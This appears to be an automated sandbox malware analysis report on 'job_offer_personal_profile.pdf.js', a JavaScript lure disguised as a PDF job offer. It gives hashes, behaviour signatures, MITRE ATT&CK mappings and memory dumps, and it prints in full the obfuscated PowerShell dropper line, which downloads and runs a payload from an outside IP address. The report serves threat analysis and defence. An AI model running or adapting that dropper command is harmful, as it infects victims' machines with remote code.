97dabca268785ff70da0f954929ec7767861f9a72a61903bafb08691cbd8d1a0

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
19-07-2024 19:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

job_offer_personal_profile.pdf.js
Size

46KB
MD5

4aa0d4b34e801f9e29a10988a5cb9d50
SHA1

e8b266857a307c5ced537018138e82f8173331fc
SHA256

97dabca268785ff70da0f954929ec7767861f9a72a61903bafb08691cbd8d1a0
SHA512

c5e511587c2d3e63b661deaa27fdccb3122a8aaa5722573fdb9a2f3ccd901e9002007a4cee4cb76b0e9db13f56e99844d8d70f1690107a6540388c0a054d4187
SSDEEP

768:e+2+2+w3C6+M3C6+M3C6+b3C6+aK3C6+wF3C6+DeV53C6+wn39OUz83C6+j8Gdsd:e11bC6xC6xC6AC6yC6FC6xC6zNO0wC6r

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://176.113.115.177/x/z.png

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2448	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2448	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2448	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 3032 wrote to memory of 2448	3032	wscript.exe	30
PID 3032 wrote to memory of 2448	3032	wscript.exe	30
PID 3032 wrote to memory of 2448	3032	wscript.exe	30

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\job_offer_personal_profile.pdf.js
1⤵
- Suspicious use of WriteProcessMemory
PID:3032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(N%ew-Obje%c%t Ne%t.W%e';$c4='bCl%ie%nt).Do%%wn%l%o';$c3='adS%tri%%ng(''h%tt%p:%%//17%%%6.1%13%.11%%5.1%%%77%/%x/z%.p%n%%%g'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2448

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2448-4-0x000007FEF5EDE000-0x000007FEF5EDF000-memory.dmp

Filesize
4KB

Download
memory/2448-5-0x000000001B730000-0x000000001BA12000-memory.dmp

Filesize
2.9MB

Download
memory/2448-6-0x0000000002000000-0x0000000002008000-memory.dmp

Filesize
32KB

Download
memory/2448-8-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2448-7-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2448-9-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2448-10-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download